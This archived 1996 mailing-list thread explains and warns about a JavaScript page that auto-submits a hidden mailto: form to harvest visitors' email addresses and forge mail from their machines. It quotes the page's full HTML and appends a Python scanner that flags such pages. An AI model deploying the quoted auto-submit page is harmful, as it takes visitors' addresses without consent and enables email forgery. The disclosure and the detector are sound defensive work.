
JavaScript to grab e-mail <explained> (fwd)



This is something that I had not seen posted here as of yet.  (Sorry if it
has.  My mail feed has been suffering from Alzheimer's as of late and
getting progressively worse...)

Crypto Relevance:  None
Privacy Relevance: Lots

This was forwarded to me by the "CGI Guy" at Teleport.  I had heard this was
possible.  I was quite surprised to find just how *easy* this is!  I can see
a number of creative (and scary) uses for this little hack.  (This makes
JavaScript seem more like a coffee enema.)

--------- Forwarded message ---------------

>Well, here it is...  I've been yelling about Netscape's use of the 
>action="mailto:[email protected]" for a long time.  By clicking on a submit 
>button (with any name) you can grab the user's email address, sig file 
>and other prefs.  
>
>JavaScript in Netscape 2.0 removes the necessary "click."  I'm sending 
>visitors to my site a notification of this problem.
>
>Robert Muhlestein
>Teleport Creative Services
>CGI Guy
>[email protected]
>
>---------- Forwarded message ----------
>Date: Mon, 26 Feb 1996 16:52:30 +0100
>From: Lincoln Stein <[email protected]>
>To: [email protected], [email protected]
>Cc: [email protected]
>Subject: Re: JavaScript to grab e-mail <explained>
>
>I just had a look at the e-mail scamming script (URL
>http://www.popco.com/grabtest.html).  It's quite simple.  Here's the
>complete text:
>
><HTML>
><HEAD>
></HEAD>
><BODY onLoad="document.mailme.submit()">
>
><form method=post name="mailme"
>      action="mailto:[email protected]?subject=scammed address">
>
><h3>Viewing this page automatically submits email to an 
>address which then sends you back email to prove it grabbed the message.</h3>
>
><input type=hidden name="scammed.the.address" value="did it">
></form>
>
></BODY>
></HTML>
>
>Basically what the script does is to make the browser submit e-mail to
>the indicated mailto: URL.  When the mail is sent, the user's reply
>address is included as a matter of course.
>
>The good news is that this does _not_ represent a general security
>hole in JavaScript itself.  I was concerned that someone had
>discovered a way to make JavaScript divulge such browser secrets as
>the contents of the disk cache, history list, or newsgroup
>subscriptions.  
>
>The bad news is that this technique can be used as a general Internet
>e-mail forgery system.  Anybody accessing a particular page will
>unwittingly mail out an e-mail message, whose recipient, subject and
>message body are all under the control of the JavaScript author.  If
>the message is traced back, it will be found to have originated from
>the user's machine.
>
>Lincoln
>
>
---
Alan Olsen -- [email protected] -- Contract Web Design & Instruction
        `finger -l [email protected]` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.
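
An added example, not part of the original messages: a static check in Python that flags pages whose form posts to a mailto: URL, and separates the case that needs a click on a submit button from the script-submitted case described above. The class and function names, the risk labels and the sample pages are assumptions made for this example; it inspects only inline event handlers and inline script, and does not tie a submit() call to a particular form.

```python
import re
from html.parser import HTMLParser

SUBMIT_CALL = re.compile(r"\.submit\s*\(")  # e.g. document.mailme.submit()

class MailtoFormScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.mailto_forms = []  # (form name, action URL)
        self.submit_calls = []  # where script calls submit()
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names (onLoad -> onload).
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "form" and attrs.get("action", "").strip().lower().startswith("mailto:"):
            self.mailto_forms.append((attrs.get("name", ""), attrs["action"]))
        # Event handlers (onload, onclick, ...) can submit the form from script.
        for name, value in attrs.items():
            if name.startswith("on") and SUBMIT_CALL.search(value):
                self.submit_calls.append(f"{tag} {name}")
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and SUBMIT_CALL.search(data):
            self.submit_calls.append("script block")

def scan(html):
    p = MailtoFormScanner()
    p.feed(html)
    p.close()
    if not p.mailto_forms:
        risk = "none"
    else:
        risk = "automatic" if p.submit_calls else "needs-click"
    return {"risk": risk, "forms": p.mailto_forms, "submit_calls": p.submit_calls}

# Constructed samples; the address is a placeholder, not one from the thread.
AUTO = """<body onLoad="document.mailme.submit()">
<form method=post name="mailme" action="mailto:collector@example.invalid?subject=test">
<input type=hidden name="field" value="x"></form></body>"""
CLICK = """<form method=post action="MAILTO:collector@example.invalid">
<input type=submit value="Send"></form>"""

if __name__ == "__main__":
    for label, page in (("auto", AUTO), ("click", CLICK)):
        print(label, scan(page))
```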